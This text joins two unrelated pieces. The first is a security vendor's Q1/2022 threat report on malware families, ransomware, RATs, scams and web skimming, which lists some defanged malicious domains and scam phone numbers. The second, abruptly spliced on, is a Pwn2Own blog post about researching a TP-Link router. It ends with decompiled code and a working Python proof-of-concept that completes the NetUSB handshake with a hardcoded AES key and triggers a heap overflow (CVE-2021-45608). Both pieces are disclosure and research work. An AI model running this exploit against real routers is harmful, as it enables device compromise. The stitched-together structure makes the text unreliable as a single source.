The most common coinminers in Q1/22 were:
XMRig
NeoScrypt
CoinBitMiner
CoinHelper
Jan Rubín, Malware Researcher
Information Stealers
The activities of Information Stealers haven’t significantly changed in Q1/22 compared to Q4/21. FormBook, AgentTesla, and RedLine remain the most prevalent stealers; in combination, they are accountable for 50% of the hits within the category.
We noticed the regional distribution has completely shifted compared to the previous quarter. In Q4/21, Singapore, Yemen, Turkey, and Serbia were the countries most affected by information stealers; in Q1/22, Russia, Brazil, and Argentina rose to the top tier after the increases in risk ratio by 27% (RU), 21% (BR), and 23% (AR) compared to the previous quarter.
Not only a popular destination for information stealers, Latin America also houses many regional-specific stealers capable of compromising victims’ banking accounts. As the underground hacking culture continues to develop in Brazil, these threat groups target their fellow citizens for financial purposes. In Brazil, Ousaban and Chaes pose the most significant threats with more than 100k and 70k hits. In Mexico in Q1/22, we observed more than 34k hits from Casbaneiro. A typical pattern shared between these groups is the multiple-stage delivery chain utilizing scripting languages to download and deploy the next stage’s payload while employing DLL sideloading techniques to execute the final stage.
Furthermore, Raccoon Stealer, an information stealer with Russian origins, significantly decreased in activity since March. Further investigation uncovered messages on Russian underground forums advising that the Raccoon group is not working anymore. A few days after the messages were posted, a Raccoon representative said one of their members died in the Ukrainian War – they have paused operations and plan to return in a few months with a new product.
Next, a macOS malware dubbed DazzleSpy was found using watering hole attacks targeting Chinese pro-democracy sympathizers; it was primarily active in Asia. This backdoor can control macOS remotely, execute arbitrary commands, and download and upload files to attackers, thus enabling keychain stealing, key-logging, and potential screen capture.
Last but not least, more malware that natively runs on M1 Apple chips (and Intel hardware) has been found. The malware family, SysJoker, targets all desktop platforms (Linux, Windows, and macOS); the backdoor is controlled remotely and allows downloading other payloads and executing remote commands.
Anh Ho, Malware Researcher Igor Morgenstern, Malware Researcher Vladimir Martyanov, Malware Researcher Vladimír Žalud, Malware Analyst
Ransomware
We’ve previously reported a decline in the total number of ransomware attacks in Q4/21. In Q1/22, this trend continued with a further slight decrease. As can be seen on the following graph, there was a drop at the beginning of 2022; the number of ransomware attacks has since stabilized.
We believe there are multiple reasons for these recent declines – such as the geopolitical situation (discussed shortly) and the continuation of the trend of ransomware gangs focusing more on targeted attacks on big targets (big game hunting) rather than on regular users via the spray and pray techniques. In other words, ransomware is still a significant threat, but the attackers have slightly changed their targets and tactics. As you will see in the rest of this section, the total numbers are lower, but there was a lot ongoing regarding ransomware in Q1.
Based on our telemetry, the distribution of targeted countries is similar to Q4/21 with some Q/Q shifts, such as Mexico (+120% risk ratio), Japan (+37%), and India (+34%).
The most (un)popular ransomware strains – STOP and WannaCry – kept their position at the top. Operators of the STOP ransomware keep releasing new variants, and the same applies for the CrySiS ransomware. In both cases, the ransomware code hasn’t considerably evolved, so a new variant merely means a new extension of encrypted files, different contact e-mail and a different public RSA key.
The most prevalent ransomware strains in Q1/22:
WannaCry
STOP
VirLock
GlobeImposter
Makop
Out of the groups primarily focused on targeted attacks, the most active ones based on our telemetry were LockBit, Conti, and Hive. The BlackCat (aka ALPHV) ransomware was also on the rise. The LockBit group boosted their presence and also their egos, as demonstrated by their claim that they will pay any FBI agent that reveals their location a bounty of $1M. Later, they expanded that offer to any person on the planet.
You may also recall Sodinokibi (aka REvil), which is regularly mentioned in our threat reports. There is always something interesting around this ransomware strain and its operators with ties to Russia. In our Q4/21 Threat Report we informed about the arrests of some of its operators by Russian authorities. Indeed, this resulted in Sodinokibi almost vanishing from the threat landscape in Q1/2022. However, the situation got messy at the very end of Q1/2022 and early in April as new Sodinokibi indicators started appearing, including the publishing of new leaks from ransomed companies and malware samples. It is not yet clear whether this is a comeback, an imposter operation, reused Sodinokibi sources or infrastructure, or even their combination by multiple groups. Our gut feeling is that Sodinokibi will be a topic in the Q2/22 Threat Report once again.
Russian ransomware affiliates are a never-ending story. E.g. we can mention an interesting public exposure of a criminal dubbed Wazawaka with ties to Babuk, DarkSide, and other ransomware gangs in February. In a series of drunk videos and tweets he revealed much more than his missing finger.
The Russian invasion and following war on Ukraine, the most terrible event in Q1/22, had its counterpart in cyber-space. Just one day before the invasion, several cyber attacks were detected. Shortly after the discovery of HermeticWiper malware by ESET, Avast also discovered ransomware attacking Ukrainian targets. We dubbed it HermeticRansom. Shortly after, a flaw in the ransomware was found by CrowdStrike analysts. We acted swiftly and released a free decryptor to help victims in Ukraine. Furthermore, the war impacted ransomware attacks, as some of the ransomware authors and affiliates are from Ukraine and likely have been unable to carry out their operations due to the war.
And the cyber-war went on, together with the real one. A day after the start of the invasion, the Conti ransomware gang claimed its allegiance and threatened anyone who was considering organizing a cyber-attack or war activities against Russia:
As a reaction, a Ukrainian researcher started publishing internal files of the Conti gang, including Jabber conversations and the source code of the Conti ransomware itself. However, no significant amount of encryption keys were leaked. Also, the sources that were published were older versions of the Conti ransomware, which no longer correspond to the layout of the encrypted files that are created by today’s version of the ransomware. The leaked files and internal communications provide valuable insight into this large cybercrime organization, and also temporarily slowed down their operations.
Among the other consequences of the Conti leak, the published source codes were soon used by the NB65 hacking group. This gang declared a karmic war on Russia and used one of the modified sources of the Conti ransomware to attack Russian targets.
Furthermore, in February, members of historically one of the most active (and successful) ransomware groups, Maze, announced a shut-down of their operation. They published master decryption keys for their ransomware strains Maze, Egregor, and Sekhmet; four archive files were published that contained:
30 private RSA-2048 keys (plus 9 from old version) for Maze ransomware. Maze also uses a three-key encryption scheme.
A single private RSA-2048 key for Sekhmet ransomware. Because this strain uses this RSA key to encrypt the per-file key, the RSA private key is likely campaign specific.
A source code for the M0yv x86/x64 file infector, that was used by Maze operators in the past.
Next, an unpleasant turn of events happened after we released a decryptor for the TargetCompany ransomware in February. This immediately helped multiple ransomware victims; however, two weeks later, we discovered a new variant of TargetComany that started using the ”.avast” extension for encrypted files. Shortly after, the malware authors changed the encryption algorithm, so our free decryption tool does not decrypt the most recent variant.
On the bright side, we also analyzed multiple variants of the Prometheus ransomware and released a free decryptor. This one covers all decryptable variants of the ransomware strain, even the latest ones.
Jakub Křoustek, Malware Research Director Ladislav Zezula, Malware Researcher
Remote Access Trojans (RATs)
New year, new me RAT campaigns. As mentioned in the Q4/21 report, the RAT activity downward trend will be just temporary; the reality was a textbook example of this claim. Even malicious actors took holidays at the beginning of the new year and then returned to work.
In the graph below, we can see a Q4/21 vs. Q1/22 comparison of RAT activity:
This quarter’s countries most affected were China, Tajikistan, Kyrgyzstan, Iraq, Kazakhstan, and Russia. Kazakhstan will be mentioned later on with the emergence of a new RAT. We also detected a high Q/Q increase in the risk ratio in countries involved in the ongoing war: Ukraine (+54%), Russia (+53%), and Belarus (+46%).
In this quarter, we spotted a new campaign distributing several RATs, reaching thousands of users, mainly in Italy (1,900), Romania (1,100), and Bulgaria (950). The campaign leverages a Crypter (a crypter is a specific tool used by malware authors for obfuscation and protection of the target payload), which we call Rattler, that ensures a distribution of arbitrary malware onto the victim’s PC. Currently, the crypter primarily distributes remote access trojans, focusing on Warzone, Remcos, and NetWire. Warzone’s main targeting campaigns also seemed to change during the past three months. In January and February, we received a considerable amount of detections from Russia and Ukraine. Still, this trend reversed in March, with decreased detections in these two countries and a significant increase in Spain, indicating a new malicious campaign.
Most prevalent RATs in Q1 were:
njRAT
Warzone
Remcos
AsyncRat
NanoCore
NetWire
QuasarRAT
PoisionIvy
Adwind
Orcus
Among malicious families with the highest increase in detections were Lilith, LuminosityLink, and Gh0stCringe. One of the reasons for the Gh0stCringe increase is a malicious campaign in which this RAT spread on poorly protected MySQL and Microsoft SQL database servers. We have also witnessed a change in the first two places of the most prevalent RATs. In Q4/21, the most pervasive was Warzone which declined this quarter by 23%. The njRat family, on the other hand, increased by 32%, and what was surprising, Adwind entered into the top 10.
Except for the usual malicious campaigns, this quarter was different. There were two significant causes for this. The first was a Lapsus$ hacking and leaking spree, and the other was the war with Ukraine.
The hacking group Lapsus$ targeted many prominent technology companies like Nvidia, Samsung, and Microsoft. For example, in the NVIDIA Lapsus$ case, this hacking group stole about 1TB of NVIDIA’s data and then commenced to leak it. The leaked data contained binary signing certificates, which were later used for signing malicious binaries. Among such signed malware was, for example, the Quasar RAT.
Then there was the conflict in Ukraine, which showed the power of information technology and the importance of cyber security – because the fight happens not only on the battlefield but also in cyberspace, with DDOS attacks, data-stealing, exploitation, cyber espionage, and other techniques. But except for these countries involved in the war, everyday people looking for information are easy targets of malicious campaigns. One such campaign involved sending email messages with attached office documents that allegedly contained important information about the war. Unfortunately, these documents were just a way to infect people with Remcos RAT with the help of Microsoft Word RCE vulnerability CVE-2017-11882, thanks to which the attacker could easily infect unpatched systems.
As always, not only old known RATs showed up. This quarter brought us a few new ones as well. The first addition to our RAT list was IceBot. This RAT seems to be a creation of the APT group FIN7; it contains all usual basic capabilities as other RATs like taking screenshots, remote code execution, file transfer, and detection of installed AV.
Another one is Hodur. This RAT is a variant of PlugX (also known as Korplug), associated with Chinese APT organizations. Hodur differed, using a different encoding, configuration capabilities, and C&C commands. This RAT allows attackers to log keystrokes, manipulate files, fingerprint the system and more.
We mentioned that Kazakhstan is connected to a new RAT on this list. That RAT is called Borat RAT. The name is taken from the popular comedy film Borat where the main character Borat Sagdijev, performed by actor Sacha Baron Cohen, was presented as a Kazakh visiting the USA. Did you know that in reality the part of the film that should represent living in Kazakhstan village wasn’t even filmed there but in the Romanian village of Glod?
This RAT is a .NET binary and uses simple source-code obfuscation. The Borat RAT was initially discovered on hacking forums and contains many capabilities. Some features include triggering BSOD, anti-sandbox, anti-VM, password stealing, web-cam spying, file manipulation and more. As well as these baked-in features, it enables extensive module functionality. These modules are DLLs that are downloaded on demand, allowing the attackers to add multiple new capabilities. The list of currently available modules contains files “Ransomware.dll” used for encrypting files, “Discord.dll” for stealing Discord tokens, and many more.
Here you can see an example of the Borat RAT admin panel.
We also noticed that the volume of Python compiled and Go programming language ELF binaries for Linux increased this quarter. The threat actors used open source RAT projects (i.e. Bring Your Own Botnet or Ares) and legitimate services (e.g. Onion.pet, termbin.com or Discord) to compromise systems. We were also one of the first to protect users against Backdoorit and Caligula RATs; both of these malware families were written in Go and captured in the wild by our honeypots.
Samuel Sidor, Malware Researcher Jan Rubín, Malware Researcher David Àlvarez, Malware Researcher
Rootkits
In Q1/22, rootkit activity was reduced compared to the previous quarter, returning to the long-term value, as illustrated in the chart below.
The close-up view of Q1/22 demonstrates that January and February have been more active than the March period.
We have monitored various rootkit strains in Q1/22. However, we have identified that approx. 37% of rootkit activity is r77-Rootkit (R77RK) developed by bytecode77 as an open-source project under the BSD license. The rootkit operates in Ring 3 compared to the usual rootkits that work in Ring 0. R77RK is a configurable tool hiding files, directories, scheduled tasks, processes, services, connections, etc. The tool is compatible with Windows 7 and Windows 10. The consequence is that R77RK was captured with several different types of malware as a supporting library for malware that needs to hide malicious activity.
The graph below shows that China is still the most at-risk country in terms of protected users. Moreover, the risk in China has increased by about +58%, although total rootkit activity has been orders of magnitude lower compared to Q4/21. This phenomenon is caused by the absence of the Cerbu rootkit that was spread worldwide, so the main rootkit activity has moved back to China. Namely, the decrease in the rootkit activity has been observed in the countries as follows: Vietnam, Thailand, the Czech Republic, and Egypt.
In summary, the situation around the rootkit activity seems calmer compared to Q4/21, and China is still the most affected country in Q1/22. Noteworthy, the war in Ukraine has not increased the rootkit activity. Numerous malware authors have started using open-source solutions of rootkits, although these are very well detectable.
Martin Chlumecký, Malware Researcher
Technical support scams
After quite an active Q4/21 that overlapped with the beginning of Q1/22, technical support scams started to decline in inactivity. There were some small peaks of activity, but the significant wave of one particular campaign came at the end of Q1/22.
According to our data, the most targeted countries were the United States and Canada. However, we’ve seen instances of this campaign active even in other areas, like Europe, for example, France and Germany.
The distinctive sign of this campaign was the lack of a domain name and a specific path; this is illustrated in the following image.
During the beginning of March, we collected thousands of new unique domain-less URLs that have one significant and distinctive sign, their url path. After being redirected, an affected user loads a web page with a well-known recycled appearance, used in many previous technical support campaigns. In addition, several pop-up windows, the logo of well-known companies, antivirus-like messaging, cursor manipulation techniques, and even sounds are all there for one simple reason: a phone call to the phone number shown.
More than twenty different phone numbers have been used. Examples of such numbers can be seen in the following table:
1-888-828-5604
1-888-200-5532
1-877-203-5120
1-888-770-6555
1-855-433-4454
1-833-576-2199
1-877-203-9046
1-888-201-5037
1-866-400-0067
1-888-203-4992
Alexej Savčin, Malware Analyst
Traffic Direction System (TDS)
A new Traffic Direction System (TDS) we are calling Parrot TDS was very active throughout Q1/2022. The TDS has infected various web servers hosting more than 16,500 websites, ranging from adult content sites, personal websites, university sites, and local government sites.
Parrot TDS acts as a gateway for other malicious campaigns to reach potential victims. In this particular case, the infected sites’ appearances are altered by a campaign called FakeUpdate (also known as SocGholish), which uses JavaScript to display fake notices for users to update their browser, offering an update file for download. The file observed being delivered to victims is a remote access tool.
From March 1, 2022, to March 29, 2022, we protected more than 600,000 unique users from around the globe from visiting these infected sites. We protected the most in Brazil – over 73,000 individual users, in India – nearly 55,000 unique users, and more than 31,000 unique users from the US.
Jan Rubín, Malware Researcher Pavel Novák, Threat Operations Analyst
Vulnerabilities and Exploits
Spring in Europe has had quite a few surprises for us, one of them being a vulnerability in a Java framework called, ironically, Spring. The vulnerability is called Spring4Shell (CVE-2022-22963), mimicking the name of last year’s Log4Shell vulnerability. Similarly to Log4Shell, Spring4Shell leads to remote code execution (RCE). Under specific conditions, it is possible to bind HTTP request parameters to Java objects. While there is a logic protecting classLoader from being used, it was not foolproof, which led to this vulnerability. Fortunately, the vulnerability requires a non-default configuration, and a patch is already available.
The Linux kernel had its share of vulnerabilities; a vulnerability was found in pipes, which usually provide unidirectional interprocess communication, that can be exploited for local privilege escalation. The vulnerability was dubbed Dirty Pipe (CVE-2022-0847). It relies on the usage of partially uninitialized memory of the pipe buffer during its construction, leading to an incorrect value of flags, potentially providing write-access to pages in the cache that were originally marked with a read-only attribute. The vulnerability is already patched in the latest kernel versions and has already been fixed in most mainstream Linux distributions.
First described by Trend Micro researchers in 2019, the SLUB malware is a highly targeted and sophisticated backdoor/RAT spread via browser exploits. Now, three years later, we detected its new exploitation attack, which took place in Japan and targeted an outdated Internet Explorer.
The initial exploit injects into winlogon.exe, which will, in turn, download and execute the final stage payload. The final stage did not change much since the initial report, and it still uses Slack as a C&C server but now uses file[.]io for data exfiltration.
This is an excellent example that old threats never really go away; they often continue to evolve and pose a threat.
Adolf Středa, Malware Researcher Jan Vojtěšek, Malware Reseracher
Mikrotik CVEs keep giving
It’s been almost four years since the very severe vulnerability CVE-2018-14847 targeting MikroTik devices first appeared. What seemed to be yet another directory traversal bug quickly escalated into user database and password leaks, resulting in a potentially disastrous vulnerability ready to be misused by cybercriminals. Unfortunately, the simplicity of exploiting and wide adoption of these devices and powerful features provided a solid foundation for various malicious campaigns being executed using these devices. It first started with injecting crypto mining javascript into pages script by capturing the traffic, poisoning the DNS cache, and incorporating these devices into botnets for DDoS and proxy purposes.
Unfortunately, these campaigns come in waves, and we still observe MikroTik devices being misused repeatedly. In Q1/22, we’ve seen a lot of exciting twists and turns, the most prominent of which was probably the Conti group leaks which also shed light on the TrickBot botnet. For quite some time, we knew that TrickBot abused MikroTik devices as proxy servers to hide the next tier of their C&C. The leaking of Conti and Trickbot infrastructure meant the end of this botnet. However, it also provided us clues and information about one of the vastest botnets as a service operation connecting Glupteba, Meris, crypto mining campaigns, and, perhaps also, TrickBot. We are talking about 230K devices controlled by one threat actor and rented out as a service. You can find more in our research Mēris and TrickBot standing on the shoulders of giants.
A few days before we published our research in March, a new story emerged describing the DDoS campaign most likely tied to the Sodinokibi ransomware group. Unsurprisingly most of the attacking devices were MikroTik again. A few days ago, we were contacted by security researchers from SecurityScoreCard. They have observed another DDoS botnet called Zhadnost targeting Ukrainian institutions and again using MikroTik devices as an amplification vector. This time, they were mainly misusing DNS amplification vulnerabilities.
We also saw one compelling instance of a network security incident potentially involving MikroTik routers. In the infamous cyberattack on February 24th against the Viasat KA-SAT service, attackers penetrated the management segment of the network and wiped firmware from client terminal devices.
The incident surfaced more prominently after the cyberattack paralyzed 11 gigawatts of German wind turbine production as a probable spill-over from the KA-SAT issue. The connectivity for turbines is provided by EuroSkyPark, one of the satellite internet providers using the KA-SAT network.
When we analyzed ASN AS208484, an autonomous system assigned to EuroSkyPark, we found 15 MikroTik devices with exposed TCP port 8728, which is used for API access to administer the devices. Also of concern, one of the devices had a port for an infamously vulnerable WinBox protocol port exposed to the Internet. As of now, all mentioned ports are closed and no longer accessible.
We also found SSH access remapped to non-standard ports such as 9992 or 9993. This is not typically common practice and may also indicate compromise. Attackers have been known to remap the ports of standard services (such as SSH) to make it harder to detect or even for the device owner to manage. However, this could also be configured deliberately for the same reason: to hide SSH access from plain sight.
From all the above, it’s apparent that we can expect to see similar patterns and DDoS attacks carried not only by MikroTik devices but also by other vulnerable IoT devices in the foreseeable future. On a positive note, the number of MikroTik devices vulnerable to the most commonly misused CVEs is slowly decreasing as new versions of RouterOS (OS that powers the MikroTik appliances) are rolled out. Unfortunately, however, there are many devices already compromised, and without administrative intervention, they will continue to be used for malicious operations repeatedly.
We strongly recommend that MikroTik administrators ensure they have updated and patched to protect themselves and others.
If you are a researcher and you think you have seen MikroTik devices involved in some malicious activity, please consider contacting us if you need help or consultation; since 2018, we have built up a detailed understanding of these devices’ threat landscape.
Martin Hron, Malware Researcher
Web skimming
In Q1/22, the most prevalent web skimming malicious domain was naturalfreshmall[.]com, with more than 500 e-commerce sites infected. The domain itself is no longer active, but many websites are still trying to retrieve malicious content from it. Unfortunately, it means that administrators of these sites still have not removed malicious code and these sites are likely still vulnerable. Avast protected 44k users from this attack in the first quarter.
The heatmap below shows the most affected countries in Q1/22 – Saudi Arabia, Australia, Greece, and Brazil. Compared to Q4/21, Saudi Arabia, Australia and Greece stayed at the top, but in Brazil, we protected almost two times more users than in the previous quarter. However, multiple websites were infected in Brazil, some with the aforementioned domain naturalfreshmall[.]com. In addition, we tweeted about philco.com[.]br, which was infected with yoursafepayments[.]com/fonts.css. And last but not least, pernambucanas.com[.]br was also infected with malicious javascript hidden in the file require.js on their website.
Overall the number of protected users remains almost the same as in Q4/21.
Pavlína Kopecká, Malware Analyst
Mobile-Related Threats
Adware/HiddenAds
Adware maintains its dominance over the Android threat landscape, continuing the trend from previous years. Generally, the purpose of Adware is to display out-of-context advertisements to the device user, often in ways that severely impact the user experience. In Q1/22, HiddenAds, FakeAdblockers, and others have spread to many Android devices; these applications often display device-wide advertisements that overlay the user’s intended activity or limit the app’s functionality by displaying timed ads without the ability to skip them.
Adware comes in various configurations; one popular category is stealthy installation. Such apps share common features that make them difficult for the user to identify. Hiding their application's icon from the home screen is a common technique, and using blank application icons to mask their presence. The user may struggle to identify the source of the intrusive advertisements, especially if the applications have an in-built delay timer after which they display the ads. Another Adware tactic is to use in-app advertisements that are overly aggressive, sometimes to the extent that they make the original app’s intended functionality barely usable. This is common, especially in games, where timed ads are often shown after each completed level; frequently, the ad screen time greatly exceeds the time spent playing the game.
The Google Play Store has previously been used to distribute malware, but recently, actors behind these applications have changed tactics to use browser pop-up windows and notifications to spread the Adware. These are intended to trick users into downloading and installing the application, often disguised as games, ad blockers, or various utility tools. Therefore, we strongly recommend that users avoid installing applications from unknown sources and be on the lookout for malicious browser notifications.
According to our data, India, the Middle East, and South America are the most affected regions. But Adware is not strictly limited to these regions; it’s prevalent worldwide.
As can be seen from the graph below, Adware’s presence in the mobile sphere has remained dominant but relatively unchanged. Of course, there’s slight fluctuation during each quarter, but there have been no stand-out new strains of Adware as of late.
Bankers
In Q1/2022, some interesting shifts were observed in the banking malware category. With Cerberus/Alien and its clones still leading the scoreboard by far, the battle for second place has seen a jump, where Hydra replaced the previously significant threats posed by FluBot. Additionally, FluBot has been on the decline throughout Q1..
Different banker strains have been reported to use the same distribution channels and branding, which we can also confirm observing. Many banking threats now reuse the proven techniques of masquerading as delivery services, parcel tracking apps, or voicemail apps.
After the departure of FluBot from the scene, we observed an overall slight drop in the number of affected users, but this seems only to be returning to the numbers we’ve observed in the last year, just before FluBot took the stage.
Most targeted countries remain to be Turkey, Spain and Australia.
PremiumSMS/Subscription scams
While PremiumSMS/Subscription related threats may not be as prevalent as in the previous years, they are certainly not gone for good. As reported in the Q4/21 report, a new wave of premium subscription-related scams keeps popping up. Campaigns such as GriftHorse or UltimaSMS made their rounds last year, followed by yet another similar campaign dubbed DarkHerring.
The main distribution channel for these seems to be Google Play, but they have also been observed being downloaded from alternative channels. Similar to before, this scam preys on the mobile operator’s subscription scheme, where an unsuspecting user is lured into giving out their phone number. The number is later used to register the victim to a premium subscription service. This can go undetected for a long time, causing the victim significant monetary loss due to the stealthiness of the subscription and hassle related to canceling such a subscription.
While the primary target of these campaigns seems to remain the same as in Q4/21 – targeting the Middle East, countries like Iraq, Jordan, but also Saudi Arabia, and Egypt – the scope has broadened and now includes various Asian countries as well – China, Malaysia and Vietnam amongst the riskiest ones.
As can be seen from the quarterly comparisons in the graph below, the spikes of activity of the respective campaigns are clear, with UltimaSMS and Grifthorse causing the spike in Q4/21. Darkherring is behind the Q1/22 spike.
Ransomware/Lockers
Ransomware apps and Lockers that target the Android ecosystem often attempt to ‘lock’ the user’s phone by disabling the navigation buttons and taking over the Android lock screen to prevent the user from interacting with the device and removing the malware. This is commonly accompanied by a ransom message requesting payment to the malware owner in exchange for unlocking the device.
Among the most prevalent Android Lockers seen in Q1/22 were Jisut, Pornlocker, and Congur. These are notorious for being difficult to remove and, in some cases, may require a factory reset of the phone. Some versions of lockers may even attempt to encrypt the user’s files; however, this is not frequently seen due to the complexity of encrypting files on Android devices.
The threat actors responsible for this malware generally rely on spreading through the use of third party app stores, game cheats, and adult content applications.
A common infection technique is to lure users through popular internet themes and topics – we strongly recommend that users avoid attempting to download game hacks and mods and ensure that they use reputable websites and official app stores.
In Q1/22, we’ve seen spikes in this category, mainly related to the Pornlocker family – apps masquerading as adult content providers – and were predominantly targeting users in Russia.
In the graph above, we can see the spike caused by the Pornlocker family in Q1/22.
Ondřej David, Malware Analysis Team Lead Jakub Vávra, Malware Analyst
In 2021, I finally spent some time looking at a consumer router I had been using for years. It started as a weekend project to look at something a bit different from what I was used to. On top of that, it was also a good occasion to play with new tools, learn new things.
I downloaded Ghidra, grabbed a firmware update and started to reverse-engineer various MIPS binaries that were running on my NETGEAR DGND3700v2 device. I quickly was pretty horrified with what I found and wrote Longue vue 🔭 over the weekend which was a lot of fun (maybe a story for next time?). The security was such a joke that I threw the router away the next day and ordered a new one. I just couldn't believe this had been sitting in my network for several years. Ugh 😞.
Anyways, I eventually received a brand new TP-Link router and started to look into that as well. I was pleased to see that code quality was much better and I was slowly grinding through the code after work. Eventually, in May 2021, the Pwn2Own 2021 Austin contest was announced where routers, printers and phones were available targets. Exciting. Participating in that kind of competition has always been on my TODO list and I convinced myself for the longest time that I didn't have what it takes to participate 😅.
This time was different though. I decided I would commit and invest the time to focus on a target and see what happens. It couldn't hurt. On top of that, a few friends of mine were also interested and motivated to break some code, so that's what we did. In this blogpost, I'll walk you through the journey to prepare and enter the competition with the mofoffensive team.
At this point, @pwning_me, @chillbro4201 and I are motivated and chatting hard on discord. The end goal for us is to participate to the contest and after taking a look at the contest's rules, the path of least resistance seems to be targeting a router. We had a bit more experience with them, the hardware was easy and cheap to get so it felt like the right choice.
At least, that's what we thought was the path of least resistance. After attending the contest, maybe printers were at least as soft but with a higher payout. But whatever, we weren't in it for the money so we focused on the router category and stuck with it.
Out of the 5 candidates, we decided to focus on the consumer devices because we assumed they would be softer. On top of that, I had a little bit of experience looking at TP-Link, and somebody in the group was familiar with NETGEAR routers. So those were the two targets we chose, and off we went: logged on Amazon and ordered the hardware to get started. That was exciting.
The TP-Link AC1750 Smart Wi-Fi router arrived at my place and I started to get going. But where to start? Well, the best thing to do in those situations is to get a root shell on the device. It doesn't really matter how you get it, you just want one to be able to figure out what are the interesting attack surfaces to look at.
As mentioned in the introduction, while playing with my own TP-Link router in the months prior to this I had found a post auth vulnerability that allowed me to execute shell commands. Although this was useless from an attacker perspective, it would be useful to get a shell on the device and bootstrap the research. Unfortunately, the target wasn't vulnerable and so I needed to find another way.
Oh also. Fun fact: I actually initially ordered the wrong router. It turns out TP-Link sells two line of products that look very similar: the A7 and the C7. I bought the former but needed the latter for the contest, yikers 🤦🏽♂️. Special thanks to Cody for letting me know 😅!
Getting a shell on the target
After reverse-engineering the web server for a few days, looking for low hanging fruits and not finding any, I realized that I needed to find another way to get a shell on the device.
After googling a bit, I found an article written by my countrymen: Pwn2own Tokyo 2020: Defeating the TP-Link AC1750 by @0xMitsurugi and @swapg. The article described how they compromised the router at Pwn2Own Tokyo in 2020 but it also described how they got a shell on the device, great 🙏🏽. The issue is that I really have no hardware experience whatsoever. None.
But fortunately, I have pretty cool friends. I pinged my boy @bsmtiam, he recommended to order a FT232 USB cable and so I did. I received the hardware shortly after and swung by his place. He took apart the router, put it on a bench and started to get to work.
After a few tries, he successfully soldered the UART. We hooked up the FT232 USB Cable to the router board and plugged it into my laptop:
Using Python and the minicom library, we were finally able to drop into an interactive root shell 💥:
Amazing. To celebrate this small victory, we went off to grab a burger and a beer 🍻 at the local pub. Good day, this day.
Enumerating the attack surfaces
It was time for me to figure out which areas I should try to focus my time on. I did a bunch of reading as this router has been targeted multiple times over the years at Pwn2Own. I figured it might be a good thing to try to break new grounds to lower the chance of entering the competition with a duplicate and also maximize my chances at finding something that would allow me to enter the competition. Before thinking about duplicates, I need a bug.
I started to do some very basic attack surface enumeration: processes running, iptable rules, sockets listening, crontable, etc. Nothing fancy.
At first sight, the following processes looked interesting:
- the uhttpd HTTP server,
- the third-party dnsmasq service that potentially could be unpatched to upstream bugs (unlikely?),
- the tdpServer which was popped back in 2021 and was a vector for a vuln exploited in sync-server.
Chasing ghosts
Because I was familiar with how the uhttpd HTTP server worked on my home router I figured I would at least spend a few days looking at the one running on the target router. The HTTP server is able to run and invoke Lua extensions and that's where I figured bugs could be: command injections, etc. But interestingly enough, all the existing public Lua tooling failed at analyzing those extensions which was both frustrating and puzzling. Long story short, it seems like the Lua runtime used on the router has been modified such that the opcode table appears shuffled. As a result, the compiled extensions would break all the public tools because the opcodes wouldn't match. Silly. I eventually managed to decompile some of those extensions and found one bug but it probably was useless from an attacker perspective. It was time to move on as I didn't feel there was enough potential for me to find something interesting there.
One another thing I burned time on is to go through the GPL code archive that TP-Link published for this router: ArcherC7V5.tar.bz2. Because of licensing, TP-Link has to (?) 'maintain' an archive containing the GPL code they are using on the device. I figured it could be a good way to figure out if dnsmasq was properly patched to recent vulns that have been published in the past years. It looked like some vulns weren't patched, but the disassembly showed different 😔. Dead-end.
NetUSB shenanigans
There were two strange lines in the netstat output from above that did stand out to me:
Why is there no process name associated with those sockets uh 🤔? Well, it turns out that after googling and looking around those sockets are opened by a... wait for it... kernel module. It sounded pretty crazy to me and it was also the first time I saw this. Kinda exciting though.
This NetUSB.ko kernel module is actually a piece of software written by the KCodes company to do USB over IP. The other wild stuff is that I remembered seeing this same module on my NETGEAR router. Weird. After googling around, it was also not a surprise to see that multiple vulnerabilities were discovered and exploited in the past and that indeed TP-Link was not the only router to ship this module.
Although I didn't think it would be likely for me to find something interesting in there, I still invested time to look into it and get a feel for it. After a few days reverse-engineering this statically, it definitely looked much more complex than I initially thought and so I decided to stick with it for a bit longer.
After grinding through it for a while things started to make sense: I had reverse-engineered some important structures and was able to follow the untrusted inputs deeper in the code. After enumerating a lot of places where the attacker inputs is parsed and used, I found this one spot where I could overflow an integer in arithmetic fed to an allocation function:
I first thought this was going to lead to a wild overflow type of bug because the code would try to read a very large number of bytes into this buffer but I still went ahead and crafted a PoC. That's when I realized that I was wrong. Looking carefuly, the SoftwareBus_fillBuf function is actually defined as follows:
intSoftwareBus_fillBuf(SbusConnection_t*SbusConnection,void*Buffer,intBufferLen){if(SbusConnection)if(Buffer){if(BufferLen){while(1){GetLen=KTCP_get(SbusConnection,SbusConnection->ClientSocket,Buffer,BufferLen);if(GetLen<=0)break;BufferLen-=GetLen;Buffer=(char*)Buffer+GetLen;if(!BufferLen)return1;}kc_printf("INFO%04X: _fillBuf(): len = %d\n",1275,GetLen);return0;}else{return1;}}else{// ...return0;}}else{// ...return0;}}
KTCP_get is basically a wrapper around ks_recv, which basically means an attacker can force the function to return without reading the whole BufferLen amount of bytes. This meant that I could force an allocation of a small buffer and overflow it with as much data I wanted. If you are interested to learn on how to trigger this code path in the first place, please check how the handshake works in zenith-poc.py or you can also read CVE-2021-45608 | NetUSB RCE Flaw in Millions of End User Routers from @maxpl0it. The below code can trigger the above vulnerability:
fromCrypto.CipherimportAESimportsocketimportstructimportargparsele8=lambdai:struct.pack('=B',i)le32=lambdai:struct.pack('<I',i)netusb_port=20005defsend_handshake(s,aes_ctx):# Versions.send(b'\x56\x04')# Send random datas.send(aes_ctx.encrypt(b'a'*16))_=s.recv(16)# Receive & send back the random numbers.challenge=s.recv(16)s.send(aes_ctx.encrypt(challenge))defsend_bus_name(s,name):length=len(name)assertlength-1<63s.send(le32(length))b=nameiftype(name)==str:b=bytes(name,'ascii')s.send(b)defcreate_connection(target,port,name):second_aes_k=bytes.fromhex('5c130b59d26242649ed488382d5eaecc')s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)s.connect((target,port))aes_ctx=AES.new(second_aes_k,AES.MODE_ECB)send_handshake(s,aes_ctx)send_bus_name(s,name)returns,aes_ctxdefmain():parser=argparse.ArgumentParser('Zenith PoC2')parser.add_argument('--target',required=True)args=parser.parse_args()s,_=create_connection(args.target,netusb_port,'PoC2')s.send(le8(0xff))s.send(le8(0x21))s.send(le32(0xff_ff_ff_ff))p=b'\xab'*(0x1_000*100)s.send(p)
